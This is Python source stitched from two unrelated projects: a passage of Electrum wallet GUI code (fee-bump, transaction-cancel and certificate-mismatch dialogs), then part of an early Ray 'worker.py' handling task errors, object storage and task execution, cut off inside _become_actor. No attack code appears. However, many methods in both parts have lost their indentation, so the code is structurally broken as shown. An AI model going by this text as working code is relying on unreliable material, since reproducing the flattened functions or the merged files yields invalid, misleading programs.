            warning_label.setText(warning_text)
        feerate_e.textChanged.connect(on_feerate)
        def on_slider(dyn, pos, fee_rate):
            fee_slider.activate()
            if fee_rate is not None:
                feerate_e.setAmount(fee_rate / 1000)
        fee_slider = FeeSlider(self, self.config, on_slider)
        fee_combo = FeeComboBox(fee_slider)
        # Slider starts inactive; manual edits keep it deactivated.
        fee_slider.deactivate()
        feerate_e.textEdited.connect(fee_slider.deactivate)
        grid = QGridLayout()
        grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
        grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
        grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
        grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
        grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
        grid.addWidget(feerate_e, 2, 1)
        grid.addWidget(fee_slider, 3, 1)
        grid.addWidget(fee_combo, 3, 2)
        vbox.addLayout(grid)
        cb = QCheckBox(_('Final'))
        vbox.addWidget(cb)
        vbox.addWidget(warning_label)
        vbox.addLayout(Buttons(CancelButton(d), ok_button))
        if not d.exec_():
            return
        is_final = cb.isChecked()
        new_fee_rate = feerate_e.get_amount()
        try:
            new_tx = func(new_fee_rate)
        except Exception as e:
            self.show_error(str(e))
            return
        if is_final:
            # "Final" disables further RBF on the replacement.
            new_tx.set_rbf(False)
        self.show_transaction(new_tx, tx_desc=tx_label)
def bump_fee_dialog(self, tx: Transaction):
title = _('Bump Fee')
help_text = _("Increase your transaction's fee to improve its position in mempool.")
def func(new_fee_rate):
return self.wallet.bump_fee(
tx=tx,
txid=tx.txid(),
new_fee_rate=new_fee_rate,
coins=self.get_coins())
self._rbf_dialog(tx, func, title, help_text)
def dscancel_dialog(self, tx: Transaction):
title = _('Cancel transaction')
help_text = _(
"Cancel an unconfirmed RBF transaction by double-spending "
"its inputs back to your wallet with a higher fee.")
def func(new_fee_rate):
return self.wallet.dscancel(tx=tx, new_fee_rate=new_fee_rate)
self._rbf_dialog(tx, func, title, help_text)
    def save_transaction_into_wallet(self, tx: Transaction):
        """Add an offline transaction `tx` to the wallet history.

        Returns True on success, False if the tx conflicts with existing
        history or cannot be added.  Messages are shown on the current
        top-level window (which may be a dialog, not `self`).
        """
        win = self.top_level_window()
        try:
            if not self.wallet.add_transaction(tx):
                win.show_error(_("Transaction could not be saved.") + "\n" +
                               _("It conflicts with current history."))
                return False
        except AddTransactionException as e:
            win.show_error(e)
            return False
        else:
            self.wallet.save_db()
            # need to update at least: history_list, utxo_list, address_list
            self.need_update.set()
            msg = (_("Transaction added to wallet history.") + '\n\n' +
                   _("Note: this is an offline transaction, if you want the network "
                     "to see it, you need to broadcast it."))
            win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
            return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
|
worker.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import collections
import colorama
import copy
import hashlib
import inspect
import json
import numpy as np
import os
import redis
import signal
import sys
import threading
import time
import traceback
# Ray modules
import pyarrow
import pyarrow.plasma as plasma
import ray.cloudpickle as pickle
import ray.experimental.state as state
import ray.serialization as serialization
import ray.services as services
import ray.signature as signature
import ray.local_scheduler
import ray.plasma
from ray.utils import (FunctionProperties, random_string, binary_to_hex,
is_cython)
# Worker execution modes (see Worker.set_mode for their semantics).
SCRIPT_MODE = 0
WORKER_MODE = 1
PYTHON_MODE = 2
SILENT_MODE = 3
# Event-logging span markers.
LOG_POINT = 0
LOG_SPAN_START = 1
LOG_SPAN_END = 2
# Redis key prefix under which task errors are published.
ERROR_KEY_PREFIX = b"Error:"
DRIVER_ID_LENGTH = 20
ERROR_ID_LENGTH = 20
# This must match the definition of NIL_ACTOR_ID in task.h.
NIL_ID = 20 * b"\xff"
NIL_LOCAL_SCHEDULER_ID = NIL_ID
NIL_FUNCTION_ID = NIL_ID
NIL_ACTOR_ID = NIL_ID
NIL_ACTOR_HANDLE_ID = NIL_ID
# This must be kept in sync with the `error_types` array in
# common/state/error_table.h.
OBJECT_HASH_MISMATCH_ERROR_TYPE = b"object_hash_mismatch"
PUT_RECONSTRUCTION_ERROR_TYPE = b"put_reconstruction"
# This must be kept in sync with the `scheduling_state` enum in common/task.h.
TASK_STATUS_RUNNING = 8
# Default resource requirements for remote functions.
DEFAULT_REMOTE_FUNCTION_CPUS = 1
DEFAULT_REMOTE_FUNCTION_GPUS = 0
# Default resource requirements for actors when no resource requirements are
# specified.
DEFAULT_ACTOR_METHOD_CPUS_SIMPLE_CASE = 1
DEFAULT_ACTOR_CREATION_CPUS_SIMPLE_CASE = 0
# Default resource requirements for actors when some resource requirements are
# specified.
DEFAULT_ACTOR_METHOD_CPUS_SPECIFIED_CASE = 0
DEFAULT_ACTOR_CREATION_CPUS_SPECIFIED_CASE = 1
DEFAULT_ACTOR_CREATION_GPUS_SPECIFIED_CASE = 0
class FunctionID(object):
    """Thin wrapper holding a raw function-ID value."""

    def __init__(self, function_id):
        """Store the raw ID."""
        self.function_id = function_id

    def id(self):
        """Return the wrapped raw ID."""
        return self.function_id
class RayTaskError(Exception):
    """Internal representation of a task that raised during execution.

    When a task fails, a RayTaskError is stored in the object store for
    each of its outputs; retrieving such an object re-raises the failure
    to the caller.  Either `exception` or `traceback_str` is populated,
    never both.

    Attributes:
        function_name (str): Name of the function that failed.
        exception (Exception): The underlying exception, kept only when it
            is a RayGetError or RayGetArgumentError; otherwise None.
        traceback_str (str): Traceback text from the failed execution.
    """

    def __init__(self, function_name, exception, traceback_str):
        """Initialize a RayTaskError."""
        self.function_name = function_name
        # Only get-errors are preserved as objects; any other exception
        # type is represented by its traceback string alone.
        if isinstance(exception, (RayGetError, RayGetArgumentError)):
            self.exception = exception
        else:
            self.exception = None
        self.traceback_str = traceback_str

    def __str__(self):
        """Format a RayTaskError as a string."""
        # traceback_str is None only when fetching the task arguments
        # failed; in that case report the stored exception instead.
        detail = (self.exception if self.traceback_str is None
                  else self.traceback_str)
        return ("Remote function {}{}{} failed with:\n\n{}"
                .format(colorama.Fore.RED, self.function_name,
                        colorama.Fore.RESET, detail))
class RayGetError(Exception):
    """Raised when `get` is called on an output of a failed task.

    Attributes:
        objectid (lib.ObjectID): The ObjectID that get was called on.
        task_error (RayTaskError): The error produced by the failed task.
    """

    def __init__(self, objectid, task_error):
        """Initialize a RayGetError object."""
        self.objectid = objectid
        self.task_error = task_error

    def __str__(self):
        """Format a RayGetError as a string."""
        red = colorama.Fore.RED
        reset = colorama.Fore.RESET
        return ("Could not get objectid {}. It was created by remote function "
                "{}{}{} which failed with:\n\n{}"
                .format(self.objectid, red,
                        self.task_error.function_name, reset,
                        self.task_error))
class RayGetArgumentError(Exception):
    """Raised when a task argument was produced by a failed task.

    Attributes:
        argument_index (int): Zero-based index of the failed argument in
            the present task's remote function call.
        function_name (str): Name of the function for the current task.
        objectid (lib.ObjectID): The ObjectID passed in as the argument.
        task_error (RayTaskError): The error produced by the failed task.
    """

    def __init__(self, function_name, argument_index, objectid, task_error):
        """Initialize a RayGetArgumentError object."""
        self.argument_index = argument_index
        self.function_name = function_name
        self.objectid = objectid
        self.task_error = task_error

    def __str__(self):
        """Format a RayGetArgumentError as a string."""
        red = colorama.Fore.RED
        reset = colorama.Fore.RESET
        return ("Failed to get objectid {} as argument {} for remote function "
                "{}{}{}. It was created by remote function {}{}{} which "
                "failed with:\n{}".format(self.objectid, self.argument_index,
                                          red,
                                          self.function_name,
                                          reset,
                                          red,
                                          self.task_error.function_name,
                                          reset,
                                          self.task_error))
class Worker(object):
"""A class used to define the control flow of a worker process.
Note:
The methods in this class are considered unexposed to the user. The
functions outside of this class are considered exposed.
Attributes:
functions (Dict[str, Callable]): A dictionary mapping the name of a
remote function to the remote function itself. This is the set of
remote functions that can be executed by this worker.
connected (bool): True if Ray has been started and False otherwise.
mode: The mode of the worker. One of SCRIPT_MODE, PYTHON_MODE,
SILENT_MODE, and WORKER_MODE.
cached_remote_functions_and_actors: A list of information for exporting
remote functions and actor classes definitions that were defined
before the worker called connect. When the worker eventually does
call connect, if it is a driver, it will export these functions and
actors. If cached_remote_functions_and_actors is None, that means
that connect has been called already.
cached_functions_to_run (List): A list of functions to run on all of
the workers that should be exported as soon as connect is called.
"""
    def __init__(self):
        """Initialize a Worker object with empty per-driver state.

        Connection to Redis/Plasma happens later, in connect(); until then
        definitions are accumulated in the cached_* fields.
        """
        # The functions field is a dictionary that maps a driver ID to a
        # dictionary of functions that have been registered for that driver
        # (this inner dictionary maps function IDs to a tuple of the function
        # name and the function itself). This should only be used on workers
        # that execute remote functions.
        self.functions = collections.defaultdict(lambda: {})
        # The function_properties field is a dictionary that maps a driver ID
        # to a dictionary of functions that have been registered for that
        # driver (this inner dictionary maps function IDs to a tuple of the
        # number of values returned by that function, the number of CPUs
        # required by that function, and the number of GPUs required by that
        # function). This is used when submitting a function (which can be done
        # both on workers and on drivers).
        self.function_properties = collections.defaultdict(lambda: {})
        # This is a dictionary mapping driver ID to a dictionary that maps
        # remote function IDs for that driver to a counter of the number of
        # times that remote function has been executed on this worker. The
        # counter is incremented every time the function is executed on this
        # worker. When the counter reaches the maximum number of executions
        # allowed for a particular function, the worker is killed.
        self.num_task_executions = collections.defaultdict(lambda: {})
        # Set to True by connect(); mode is assigned via set_mode().
        self.connected = False
        self.mode = None
        self.cached_remote_functions_and_actors = []
        self.cached_functions_to_run = []
        # These two hooks are injected from the actor module — TODO confirm.
        self.fetch_and_register_actor = None
        self.make_actor = None
        self.actors = {}
        self.actor_task_counter = 0
        # A set of all of the actor class keys that have been imported by the
        # import thread. It is safe to convert this worker into an actor of
        # these types.
        self.imported_actor_classes = set()
        # The number of threads Plasma should use when putting an object in the
        # object store.
        self.memcopy_threads = 12
        # When the worker is constructed. Record the original value of the
        # CUDA_VISIBLE_DEVICES environment variable.
        self.original_gpu_ids = ray.utils.get_cuda_visible_devices()
    def set_mode(self, mode):
        """Set the mode of the worker.

        The mode SCRIPT_MODE should be used if this Worker is a driver that is
        being run as a Python script or interactively in a shell. It will print
        information about task failures.

        The mode WORKER_MODE should be used if this Worker is not a driver. It
        will not print information about tasks.

        The mode PYTHON_MODE should be used if this Worker is a driver and if
        you want to run the driver in a manner equivalent to serial Python for
        debugging purposes. It will not send remote function calls to the
        scheduler and will instead execute them in a blocking fashion.

        The mode SILENT_MODE should be used only during testing. It does not
        print any information about errors because some of the tests
        intentionally fail.

        Args:
            mode: One of SCRIPT_MODE, WORKER_MODE, PYTHON_MODE, and
                SILENT_MODE.
        """
        self.mode = mode
    def store_and_register(self, object_id, value, depth=100):
        """Store an object and attempt to register its class if needed.

        Args:
            object_id: The ID of the object to store.
            value: The value to put in the object store.
            depth: The maximum number of classes to recursively register.

        Raises:
            Exception: An exception is raised if the attempt to store the
                object fails. This can happen if there is already an object
                with the same ID in the object store or if the object store is
                full.
        """
        counter = 0
        while True:
            if counter == depth:
                raise Exception("Ray exceeded the maximum number of classes "
                                "that it will recursively serialize when "
                                "attempting to serialize an object of "
                                "type {}.".format(type(value)))
            counter += 1
            try:
                self.plasma_client.put(
                    value,
                    object_id=pyarrow.plasma.ObjectID(object_id.id()),
                    memcopy_threads=self.memcopy_threads,
                    serialization_context=self.serialization_context)
                break
            except pyarrow.SerializationCallbackError as e:
                # An unregistered class was encountered. Fallback cascade:
                # (1) register it as a dict of its fields; if that fails,
                # (2) register it with cloudpickle; if even that fails,
                # (3) register with pickle locally only, then retry the put.
                try:
                    register_custom_serializer(type(e.example_object),
                                               use_dict=True)
                    warning_message = ("WARNING: Serializing objects of type "
                                       "{} by expanding them as dictionaries "
                                       "of their fields. This behavior may "
                                       "be incorrect in some cases."
                                       .format(type(e.example_object)))
                    print(warning_message)
                except (serialization.RayNotDictionarySerializable,
                        serialization.CloudPickleError,
                        pickle.pickle.PicklingError,
                        Exception):
                    # We also handle generic exceptions here because
                    # cloudpickle can fail with many different types of errors.
                    try:
                        register_custom_serializer(type(e.example_object),
                                                   use_pickle=True)
                        warning_message = ("WARNING: Falling back to "
                                           "serializing objects of type {} by "
                                           "using pickle. This may be "
                                           "inefficient."
                                           .format(type(e.example_object)))
                        print(warning_message)
                    except serialization.CloudPickleError:
                        register_custom_serializer(type(e.example_object),
                                                   use_pickle=True,
                                                   local=True)
                        warning_message = ("WARNING: Pickling the class {} "
                                           "failed, so we are using pickle "
                                           "and only registering the class "
                                           "locally."
                                           .format(type(e.example_object)))
                        print(warning_message)
def put_object(self, object_id, value):
"""Put value in the local object store with object id objectid.
This assumes that the value for objectid has not yet been placed in the
local object store.
Args:
object_id (object_id.ObjectID): The object ID of the value to be
put.
value: The value to put in the object store.
Raises:
Exception: An exception is raised if the attempt to store the
object fails. This can happen if there is already an object
with the same ID in the object store or if the object store is
full.
"""
# Make sure that the value is not an object ID.
if isinstance(value, ray.local_scheduler.ObjectID):
raise Exception("Calling 'put' on an ObjectID is not allowed "
"(similarly, returning an ObjectID from a remote "
"function is not allowed). If you really want to "
"do this, you can wrap the ObjectID in a list and "
"call 'put' on it (or return it).")
if isinstance(value, ray.actor.ActorHandleParent):
raise Exception("Calling 'put' on an actor handle is currently "
"not allowed (similarly, returning an actor "
"handle from a remote function is not allowed).")
# Serialize and put the object in the object store.
try:
self.store_and_register(object_id, value)
except pyarrow.PlasmaObjectExists as e:
# The object already exists in the object store, so there is no
# need to add it again. TODO(rkn): We need to compare the hashes
# and make sure that the objects are in fact the same. We also
# should return an error code to the caller instead of printing a
# message.
print("The object with ID {} already exists in the object store."
.format(object_id))
    def retrieve_and_deserialize(self, object_ids, timeout, error_timeout=10):
        """Fetch and deserialize `object_ids` from Plasma in bounded batches.

        Retries on deserialization-callback errors (waiting for the import
        thread to register the needed class), warning the driver once if
        the wait exceeds `error_timeout` seconds.  Returns a list of the
        deserialized values; on an invalid Arrow payload, every slot is a
        RayTaskError describing the likely worker death.
        """
        start_time = time.time()
        # Only send the warning once.
        warning_sent = False
        while True:
            try:
                # We divide very large get requests into smaller get requests
                # so that a single get request doesn't block the store for a
                # long time, if the store is blocked, it can block the manager
                # as well as a consequence.
                results = []
                for i in range(0, len(object_ids),
                               ray._config.worker_get_request_size()):
                    results += self.plasma_client.get(
                        object_ids[i:(i +
                                      ray._config.worker_get_request_size())],
                        timeout,
                        self.serialization_context)
                return results
            except pyarrow.lib.ArrowInvalid as e:
                # TODO(ekl): the local scheduler could include relevant
                # metadata in the task kill case for a better error message
                invalid_error = RayTaskError(
                    "<unknown>", None,
                    "Invalid return value: likely worker died or was killed "
                    "while executing the task.")
                return [invalid_error] * len(object_ids)
            except pyarrow.DeserializationCallbackError as e:
                # Wait a little bit for the import thread to import the class.
                # If we currently have the worker lock, we need to release it
                # so that the import thread can acquire it.
                if self.mode == WORKER_MODE:
                    self.lock.release()
                time.sleep(0.01)
                if self.mode == WORKER_MODE:
                    self.lock.acquire()
                if time.time() - start_time > error_timeout:
                    warning_message = ("This worker or driver is waiting to "
                                       "receive a class definition so that it "
                                       "can deserialize an object from the "
                                       "object store. This may be fine, or it "
                                       "may be a bug.")
                    if not warning_sent:
                        ray.utils.push_error_to_driver(
                            self.redis_client, "wait_for_class",
                            warning_message,
                            driver_id=self.task_driver_id.id())
                    warning_sent = True
    def get_object(self, object_ids):
        """Get the value or values in the object store associated with the IDs.

        Return the values from the local object store for object_ids. This
        will block until all the values for object_ids have been written to
        the local object store.

        Args:
            object_ids (List[object_id.ObjectID]): A list of the object IDs
                whose values should be retrieved.

        Returns:
            A list of deserialized values, in the same order as object_ids.

        Raises:
            Exception: If any element of object_ids is not an ObjectID.
        """
        # Make sure that the values are object IDs.
        for object_id in object_ids:
            if not isinstance(object_id, ray.local_scheduler.ObjectID):
                raise Exception("Attempting to call `get` on the value {}, "
                                "which is not an ObjectID.".format(object_id))
        # Do an initial fetch for remote objects. We divide the fetch into
        # smaller fetches so as to not block the manager for a prolonged period
        # of time in a single call.
        plain_object_ids = [plasma.ObjectID(object_id.id())
                            for object_id in object_ids]
        for i in range(0, len(object_ids),
                       ray._config.worker_fetch_request_size()):
            self.plasma_client.fetch(
                plain_object_ids[i:(i +
                                    ray._config.worker_fetch_request_size())])
        # Get the objects. We initially try to get the objects immediately.
        final_results = self.retrieve_and_deserialize(plain_object_ids, 0)
        # Construct a dictionary mapping object IDs that we haven't gotten yet
        # to their original index in the object_ids argument.
        unready_ids = dict((plain_object_ids[i].binary(), i) for (i, val) in
                           enumerate(final_results)
                           if val is plasma.ObjectNotAvailable)
        was_blocked = (len(unready_ids) > 0)
        # Try reconstructing any objects we haven't gotten yet. Try to get them
        # until at least get_timeout_milliseconds milliseconds passes, then
        # repeat.
        while len(unready_ids) > 0:
            # Ask the local scheduler to reconstruct each still-missing
            # object (e.g. if it was evicted or lost).
            for unready_id in unready_ids:
                self.local_scheduler_client.reconstruct_object(unready_id)
            # Do another fetch for objects that aren't available locally yet,
            # in case they were evicted since the last fetch. We divide the
            # fetch into smaller fetches so as to not block the manager for a
            # prolonged period of time in a single call.
            object_ids_to_fetch = list(map(
                plasma.ObjectID, unready_ids.keys()))
            for i in range(0, len(object_ids_to_fetch),
                           ray._config.worker_fetch_request_size()):
                self.plasma_client.fetch(
                    object_ids_to_fetch[i:(
                        i + ray._config.worker_fetch_request_size())])
            # The timeout grows with the number of outstanding objects so a
            # large get does not poll too aggressively.
            results = self.retrieve_and_deserialize(
                object_ids_to_fetch,
                max([ray._config.get_timeout_milliseconds(),
                     int(0.01 * len(unready_ids))]))
            # Remove any entries for objects we received during this iteration
            # so we don't retrieve the same object twice.
            for i, val in enumerate(results):
                if val is not plasma.ObjectNotAvailable:
                    object_id = object_ids_to_fetch[i].binary()
                    index = unready_ids[object_id]
                    final_results[index] = val
                    unready_ids.pop(object_id)
        # If there were objects that we weren't able to get locally, let the
        # local scheduler know that we're now unblocked.
        if was_blocked:
            self.local_scheduler_client.notify_unblocked()
        assert len(final_results) == len(object_ids)
        return final_results
    def submit_task(self, function_id, args, actor_id=None,
                    actor_handle_id=None, actor_counter=0,
                    is_actor_checkpoint_method=False, actor_creation_id=None,
                    actor_creation_dummy_object_id=None,
                    execution_dependencies=None, num_return_vals=None,
                    num_cpus=None, num_gpus=None, resources=None):
        """Submit a remote task to the scheduler.

        Tell the scheduler to schedule the execution of the function with ID
        function_id with arguments args. Retrieve object IDs for the outputs
        of the function from the scheduler and immediately return them.

        Args:
            function_id: The ID of the function to execute.
            args: The arguments to pass into the function. Arguments can be
                object IDs or they can be values. If they are values, they
                must be serializable objects.
            actor_id: The ID of the actor that this task is for.
            actor_handle_id: The ID of the actor handle this task is submitted
                through. Must be provided if and only if actor_id is provided.
            actor_counter: The counter of the actor task.
            is_actor_checkpoint_method: True if this is an actor checkpoint
                task and false otherwise.
            actor_creation_id: The ID of the actor to create, if this is an
                actor creation task.
            actor_creation_dummy_object_id: If this task is an actor method,
                then this argument is the dummy object ID associated with the
                actor creation task for the corresponding actor.
            execution_dependencies: The execution dependencies for this task.
            num_return_vals: The number of return values this function should
                have.
            num_cpus: The number of CPUs required by this task.
            num_gpus: The number of GPUs required by this task.
            resources: The resource requirements for this task. Must not
                contain the keys "CPU" or "GPU"; use num_cpus/num_gpus for
                those.

        Returns:
            The return object IDs for this task.

        Raises:
            ValueError: If resources contains the keys "CPU" or "GPU".
        """
        with log_span("ray:submit_task", worker=self):
            check_main_thread()
            if actor_id is None:
                assert actor_handle_id is None
                actor_id = ray.local_scheduler.ObjectID(NIL_ACTOR_ID)
                actor_handle_id = ray.local_scheduler.ObjectID(
                    NIL_ACTOR_HANDLE_ID)
            else:
                assert actor_handle_id is not None
            if actor_creation_id is None:
                actor_creation_id = ray.local_scheduler.ObjectID(NIL_ACTOR_ID)
            if actor_creation_dummy_object_id is None:
                actor_creation_dummy_object_id = (
                    ray.local_scheduler.ObjectID(NIL_ID))
            # Put large or complex arguments that are passed by value in the
            # object store first.
            args_for_local_scheduler = []
            for arg in args:
                if isinstance(arg, ray.local_scheduler.ObjectID):
                    # Already a reference; pass it through unchanged.
                    args_for_local_scheduler.append(arg)
                elif isinstance(arg, ray.actor.ActorHandleParent):
                    # Actor handles must be wrapped before being stored.
                    args_for_local_scheduler.append(put(
                        ray.actor.wrap_actor_handle(arg)))
                elif ray.local_scheduler.check_simple_value(arg):
                    # Small simple values are carried inline in the task spec.
                    args_for_local_scheduler.append(arg)
                else:
                    args_for_local_scheduler.append(put(arg))
            # By default, there are no execution dependencies.
            if execution_dependencies is None:
                execution_dependencies = []
            # Look up the various function properties.
            function_properties = self.function_properties[
                self.task_driver_id.id()][function_id.id()]
            if num_return_vals is None:
                num_return_vals = function_properties.num_return_vals
            if resources is None and num_cpus is None and num_gpus is None:
                # No overrides given; fall back to the resources registered
                # with the function.
                resources = function_properties.resources
            else:
                resources = {} if resources is None else resources
                if "CPU" in resources or "GPU" in resources:
                    raise ValueError("The resources dictionary must not "
                                     "contain the keys 'CPU' or 'GPU'")
                resources["CPU"] = num_cpus
                resources["GPU"] = num_gpus
            # Submit the task to local scheduler.
            task = ray.local_scheduler.Task(
                self.task_driver_id,
                ray.local_scheduler.ObjectID(function_id.id()),
                args_for_local_scheduler,
                num_return_vals,
                self.current_task_id,
                self.task_index,
                actor_creation_id,
                actor_creation_dummy_object_id,
                actor_id,
                actor_handle_id,
                actor_counter,
                is_actor_checkpoint_method,
                execution_dependencies,
                resources)
            # Increment the worker's task index to track how many tasks have
            # been submitted by the current task so far.
            self.task_index += 1
            self.local_scheduler_client.submit(task)
            return task.returns()
    def run_function_on_all_workers(self, function):
        """Run arbitrary code on all of the workers.

        This function will first be run on the driver, and then it will be
        exported to all of the workers to be run. It will also be run on any
        new workers that register later. If ray.init has not been called yet,
        then cache the function and export it later.

        Args:
            function (Callable): The function to run on all of the workers.
                It is called with a single argument, a dict containing the
                executing worker under the key "worker". If it returns
                anything, its return values will not be used.
        """
        check_main_thread()
        # If ray.init has not been called yet, then cache the function and
        # export it when connect is called. Otherwise, run the function on all
        # workers.
        if self.mode is None:
            self.cached_functions_to_run.append(function)
        else:
            # Attempt to pickle the function before we need it. This could
            # fail, and it is more convenient if the failure happens before we
            # actually run the function locally.
            pickled_function = pickle.dumps(function)
            # Functions are keyed by the hash of their pickled bytes, so the
            # same function is only ever exported once.
            function_to_run_id = hashlib.sha1(pickled_function).digest()
            key = b"FunctionsToRun:" + function_to_run_id
            # First run the function on the driver.
            # We always run the task locally.
            function({"worker": self})
            # Check if the function has already been put into redis.
            function_exported = self.redis_client.setnx(b"Lock:" + key, 1)
            if not function_exported:
                # In this case, the function has already been exported, so
                # we don't need to export it again.
                return
            # Run the function on all workers.
            self.redis_client.hmset(key,
                                    {"driver_id": self.task_driver_id.id(),
                                     "function_id": function_to_run_id,
                                     "function": pickled_function})
            self.redis_client.rpush("Exports", key)
            # TODO(rkn): If the worker fails after it calls setnx and before it
            # successfully completes the hmset and rpush, then the program will
            # most likely hang. This could be fixed by making these three
            # operations into a transaction (or by implementing a custom
            # command that does all three things).
    def _wait_for_function(self, function_id, driver_id, timeout=10):
        """Wait until the function to be executed is present on this worker.

        This method will simply loop until the import thread has imported the
        relevant function. If we spend too long in this loop, that may
        indicate a problem somewhere and we will push an error message to the
        user.

        If this worker is an actor, then this will wait until the actor has
        been defined.

        Args:
            function_id (str): The ID of the function that we want to execute.
            driver_id (str): The ID of the driver to push the error message to
                if this times out.
            timeout (int): The number of seconds to wait before pushing the
                (one-time) warning to the driver.
        """
        start_time = time.time()
        # Only send the warning once.
        warning_sent = False
        while True:
            # NOTE(review): the lock presumably guards self.functions and
            # self.actors against concurrent updates by the import thread --
            # confirm against the thread that populates these tables.
            with self.lock:
                if (self.actor_id == NIL_ACTOR_ID and
                        (function_id.id() in self.functions[driver_id])):
                    break
                elif self.actor_id != NIL_ACTOR_ID and (self.actor_id in
                                                        self.actors):
                    break
                if time.time() - start_time > timeout:
                    warning_message = ("This worker was asked to execute a "
                                       "function that it does not have "
                                       "registered. You may have to restart "
                                       "Ray.")
                    if not warning_sent:
                        ray.utils.push_error_to_driver(self.redis_client,
                                                       "wait_for_function",
                                                       warning_message,
                                                       driver_id=driver_id)
                    warning_sent = True
            # Sleep outside the lock so the import thread can make progress.
            time.sleep(0.001)
def _get_arguments_for_execution(self, function_name, serialized_args):
"""Retrieve the arguments for the remote function.
This retrieves the values for the arguments to the remote function that
were passed in as object IDs. Argumens that were passed by value are
not changed. This is called by the worker that is executing the remote
function.
Args:
function_name (str): The name of the remote function whose
arguments are being retrieved.
serialized_args (List): The arguments to the function. These are
either strings representing serialized objects passed by value
or they are ObjectIDs.
Returns:
The retrieved arguments in addition to the arguments that were
passed by value.
Raises:
RayGetArgumentError: This exception is raised if a task that
created one of the arguments failed.
"""
arguments = []
for (i, arg) in enumerate(serialized_args):
if isinstance(arg, ray.local_scheduler.ObjectID):
# get the object from the local object store
argument = self.get_object([arg])[0]
if isinstance(argument, RayTaskError):
# If the result is a RayTaskError, then the task that
# created this object failed, and we should propagate the
# error message here.
raise RayGetArgumentError(function_name, i, arg, argument)
elif isinstance(argument, ray.actor.ActorHandleWrapper):
argument = ray.actor.unwrap_actor_handle(self, argument)
else:
# pass the argument by value
argument = arg
arguments.append(argument)
return arguments
def _store_outputs_in_objstore(self, object_ids, outputs):
"""Store the outputs of a remote function in the local object store.
This stores the values that were returned by a remote function in the
local object store. If any of the return values are object IDs, then
these object IDs are aliased with the object IDs that the scheduler
assigned for the return values. This is called by the worker that
executes the remote function.
Note:
The arguments object_ids and outputs should have the same length.
Args:
object_ids (List[ObjectID]): The object IDs that were assigned to
the outputs of the remote function call.
outputs (Tuple): The value returned by the remote function. If the
remote function was supposed to only return one value, then its
output was wrapped in a tuple with one element prior to being
passed into this function.
"""
for i in range(len(object_ids)):
self.put_object(object_ids[i], outputs[i])
    def _process_task(self, task):
        """Execute a task assigned to this worker.

        This method deserializes a task from the scheduler, and attempts to
        execute the task. If the task succeeds, the outputs are stored in the
        local object store. If the task throws an exception, RayTaskError
        objects are stored in the object store to represent the failed task
        (these will be retrieved by calls to get or by subsequent tasks that
        use the outputs of this task).

        Args:
            task: The task (handed out by the local scheduler) to execute.
        """
        # The ID of the driver that this task belongs to. This is needed so
        # that if the task throws an exception, we propagate the error
        # message to the correct driver.
        self.task_driver_id = task.driver_id()
        self.current_task_id = task.task_id()
        self.current_function_id = task.function_id().id()
        # Reset the per-task counters used when this task submits subtasks
        # or puts objects.
        self.task_index = 0
        self.put_index = 0
        function_id = task.function_id()
        args = task.arguments()
        return_object_ids = task.returns()
        if task.actor_id().id() != NIL_ACTOR_ID:
            # For actor tasks, the last return ID is a dummy object; remove
            # it so it is not treated as a real output below.
            dummy_return_id = return_object_ids.pop()
        function_name, function_executor = (self.functions
                                            [self.task_driver_id.id()]
                                            [function_id.id()])
        # Get task arguments from the object store.
        try:
            with log_span("ray:task:get_arguments", worker=self):
                arguments = self._get_arguments_for_execution(function_name,
                                                              args)
        except (RayGetError, RayGetArgumentError) as e:
            # These errors already carry a formatted message; no traceback.
            self._handle_process_task_failure(function_id, return_object_ids,
                                              e, None)
            return
        except Exception as e:
            self._handle_process_task_failure(
                function_id, return_object_ids, e,
                ray.utils.format_error_message(traceback.format_exc()))
            return
        # Execute the task.
        try:
            with log_span("ray:task:execute", worker=self):
                if task.actor_id().id() == NIL_ACTOR_ID:
                    outputs = function_executor.executor(arguments)
                else:
                    # Actor methods additionally receive the dummy return ID
                    # and the actor instance itself.
                    outputs = function_executor(
                        dummy_return_id,
                        self.actors[task.actor_id().id()],
                        *arguments)
        except Exception as e:
            # Determine whether the exception occured during a task, not an
            # actor method.
            task_exception = task.actor_id().id() == NIL_ACTOR_ID
            traceback_str = ray.utils.format_error_message(
                traceback.format_exc(), task_exception=task_exception)
            self._handle_process_task_failure(function_id, return_object_ids,
                                              e, traceback_str)
            return
        # Store the outputs in the local object store.
        try:
            with log_span("ray:task:store_outputs", worker=self):
                # For actor tasks the dummy output ID was already popped
                # above, so len(return_object_ids) matches the number of real
                # return values here.
                num_returns = len(return_object_ids)
                if num_returns == 1:
                    # Wrap a single return value so it lines up with the
                    # single return object ID.
                    outputs = (outputs,)
                self._store_outputs_in_objstore(return_object_ids, outputs)
        except Exception as e:
            self._handle_process_task_failure(
                function_id, return_object_ids, e,
                ray.utils.format_error_message(traceback.format_exc()))
def _handle_process_task_failure(self, function_id, return_object_ids,
error, backtrace):
function_name, _ = self.functions[
self.task_driver_id.id()][function_id.id()]
failure_object = RayTaskError(function_name, error, backtrace)
failure_objects = [failure_object for _ in
range(len(return_object_ids))]
self._store_outputs_in_objstore(return_object_ids, failure_objects)
# Log the error message.
ray.utils.push_error_to_driver(self.redis_client,
"task",
str(failure_object),
driver_id=self.task_driver_id.id(),
data={"function_id": function_id.id(),
"function_name": function_name})
    def _become_actor(self, task):
        """Turn this worker into an actor.

        Blocks until the actor class definition has been imported by the
        import thread, then registers the actor class on this worker.

        Args:
            task: The actor creation task.
        """
        # A worker can only become an actor once.
        assert self.actor_id == NIL_ACTOR_ID
        arguments = task.arguments()
        # The only argument of an actor creation task is the class ID.
        assert len(arguments) == 1
        self.actor_id = task.actor_creation_id().id()
        class_id = arguments[0]
        key = b"ActorClass:" + class_id
        # Wait for the actor class key to have been imported by the import
        # thread. TODO(rkn): It shouldn't be possible to end up in an infinite
        # loop here, but we should push an error to the driver if too much time
        # is spent here.
